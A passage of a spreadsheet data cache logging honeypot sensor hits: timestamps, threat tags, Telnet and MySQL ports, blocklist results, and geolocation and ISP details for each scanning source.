    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7449:269e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2299"/>
    <x v="2299"/>
    <s v="124-141-206-253.rev.home.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-11T02:29:43"/>
    <d v="2025-04-11T02:17:53"/>
    <d v="2025-04-11T02:29:43"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Suginami"/>
    <s v="Suginami-ku"/>
    <s v="1851510"/>
    <s v="NA"/>
    <s v="35.7048"/>
    <s v="139.623"/>
    <s v="9824"/>
    <s v="JCOM Co., Ltd."/>
    <s v="JCOM Co., Ltd."/>
    <s v="business"/>
    <s v="Jupiter Telecommunication Co. Ltd"/>
    <s v="2006-03-02"/>
    <s v="JTCL-JP"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7c8d:cefd"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2300"/>
    <x v="2300"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T02:15:23"/>
    <d v="2025-04-11T02:15:23"/>
    <d v="2025-04-11T02:15:23"/>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d4:aba6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2301"/>
    <x v="2301"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T02:14:07"/>
    <d v="2024-12-04T13:45:32"/>
    <d v="2025-04-11T02:14:07"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c6:ca4"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2302"/>
    <x v="2302"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T02:11:15"/>
    <d v="2025-03-19T00:53:50"/>
    <d v="2025-04-11T02:11:15"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Cimahi"/>
    <s v="Cimahi"/>
    <s v="1646448"/>
    <s v="NA"/>
    <s v="-6.89529"/>
    <s v="107.542"/>
    <s v="150504"/>
    <s v="PT CIGS Indonesia Digital"/>
    <s v="CIGS"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:673c:e82a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2303"/>
    <x v="2303"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T01:30:08"/>
    <d v="2025-04-11T01:30:08"/>
    <d v="2025-04-11T01:30:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:ec7a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2304"/>
    <x v="2304"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T00:50:38"/>
    <d v="2025-04-11T00:50:38"/>
    <d v="2025-04-11T00:50:38"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:b208"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2305"/>
    <x v="2305"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T00:44:23"/>
    <d v="2025-04-11T00:44:23"/>
    <d v="2025-04-11T00:44:23"/>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d6:2802"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2306"/>
    <x v="2306"/>
    <s v="NA&amp;&amp;220-135-166-129.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-11T00:28:49"/>
    <d v="2024-12-15T08:58:17"/>
    <d v="2025-04-11T00:28:49"/>
    <n v="199"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23&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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET: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dc87:a681"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2307"/>
    <x v="2307"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T00:28:22"/>
    <d v="2025-04-05T15:06:21"/>
    <d v="2025-04-11T00:28:22"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SA"/>
    <s v="Saudi Arabia"/>
    <s v="01"/>
    <s v="Riyadh Region"/>
    <s v="NA"/>
    <s v="Riyadh"/>
    <s v="108410"/>
    <s v="NA"/>
    <s v="24.6877"/>
    <s v="46.7219"/>
    <s v="35819"/>
    <s v="Etihad Etisalat, a joint stock company"/>
    <s v="Etihad Etisalat"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e99:d7a9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2308"/>
    <x v="2308"/>
    <s v="node-x2k.pool-101-109.dynamic.totinternet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-11T00:26:11"/>
    <d v="2025-04-10T08:34:59"/>
    <d v="2025-04-11T00:26:11"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Ratchathewi"/>
    <s v="Ratchathewi"/>
    <s v="7026885"/>
    <s v="NA"/>
    <s v="13.759"/>
    <s v="100.534"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="business"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:656d:a76c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2309"/>
    <x v="2309"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T00:25:54"/>
    <d v="2025-03-05T12:34:07"/>
    <d v="2025-04-11T00:25:54"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NO"/>
    <s v="Norway"/>
    <s v="15"/>
    <s v="Møre og Romsdal"/>
    <s v="NA"/>
    <s v="Ulsteinvik weather"/>
    <s v="8468896"/>
    <s v="NA"/>
    <s v="62.3434"/>
    <s v="5.84385"/>
    <s v="50304"/>
    <s v="Blix Solutions AS"/>
    <s v="BLIXCUST10412"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c27f:c72d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2310"/>
    <x v="2310"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T00:15:19"/>
    <d v="2025-04-11T00:15:19"/>
    <d v="2025-04-11T00:15:19"/>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3b5f:840c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2311"/>
    <x v="2311"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T00:11:45"/>
    <d v="2025-03-04T08:27:47"/>
    <d v="2025-04-11T00:11:45"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="48"/>
    <s v="Gyeongsangnam-do"/>
    <s v="Jinju-si"/>
    <s v="Jinju-si (Jinnyangho-ro)"/>
    <s v="1846050"/>
    <s v="52691"/>
    <s v="35.1826"/>
    <s v="128.071"/>
    <s v="9694"/>
    <s v="Seokyung Cable Television Co.. Ltd."/>
    <s v="Seokyung Cable Television Co.. Ltd."/>
    <s v="business"/>
    <s v="Scsnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3f6:84ee"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2312"/>
    <x v="2312"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T23:54:26"/>
    <d v="2025-04-08T20:38:44"/>
    <d v="2025-04-10T23:54:26"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Ümraniye"/>
    <s v="Ümraniye"/>
    <s v="10400338"/>
    <s v="NA"/>
    <s v="40.9811"/>
    <s v="29.0631"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="2007-05-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4eb0:b2ab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2313"/>
    <x v="2313"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T23:46:58"/>
    <d v="2025-04-10T23:46:58"/>
    <d v="2025-04-10T23:46:58"/>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c:9dad"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2314"/>
    <x v="2314"/>
    <s v="pcd589075.netvigator.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-10T23:28:27"/>
    <d v="2025-04-10T22:14:46"/>
    <d v="2025-04-10T23:28:27"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HCW"/>
    <s v="Central and Western"/>
    <s v="NA"/>
    <s v="Central"/>
    <s v="8223932"/>
    <s v="NA"/>
    <s v="22.2836"/>
    <s v="114.16"/>
    <s v="4760"/>
    <s v="PCCW IMS Limited"/>
    <s v="Hong Kong Telecommunications (HKT) Limited Mass Internet"/>
    <s v="business"/>
    <s v="Hong Kong Telecommunications (HKT) Limited"/>
    <s v="2001-10-25"/>
    <s v="NETVIGATOR"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:da66:794b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2315"/>
    <x v="2315"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T23:22:05"/>
    <d v="2025-04-10T23:22:05"/>
    <d v="2025-04-10T23:22:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:fe24"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2316"/>
    <x v="2316"/>
    <s v="NA&amp;&amp;118-232-88-54.dynamic.kbronet.com.tw"/>
    <x v="0"/>
    <d v="2025-04-10T22:55:35"/>
    <d v="2024-12-15T22:09:55"/>
    <d v="2025-04-10T22:55:35"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="23&amp;&amp;53135"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="38841"/>
    <s v="kbro CO. Ltd."/>
    <s v="TUNGHO"/>
    <s v="business"/>
    <s v="TUNG HO MULTIMEDIA CO. Ltd."/>
    <s v="2007-11-01"/>
    <s v="KBRO-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2007-08-27 14:41:18"/>
    <s v="2025-08-27 00:00:00"/>
    <s v="NA"/>
    <s v="ns1.kbronet.com.tw     211.76.112.59 _x000a_      ns2.kbronet.com.tw     211.76.112.60"/>
    <s v="TFN"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:76e8:5836"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2317"/>
    <x v="2317"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T22:44:52"/>
    <d v="2025-04-10T22:40:13"/>
    <d v="2025-04-10T22:44:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="PA"/>
    <s v="Pará"/>
    <s v="Redenção"/>
    <s v="Redenção"/>
    <s v="6318107"/>
    <s v="NA"/>
    <s v="-8.02861"/>
    <s v="-50.0314"/>
    <s v="262404"/>
    <s v="JC SERVICOS DE INTERNET LTDA"/>
    <s v="JC SERVICOS DE INTERNET LTDA"/>
    <s v="business"/>
    <s v="JC SERVICOS DE INTERNET LTDA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b124:f059"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2318"/>
    <x v="2318"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T21:18:54"/>
    <d v="2024-05-22T22:16:35"/>
    <d v="2025-04-10T21:18:54"/>
    <n v="4092"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
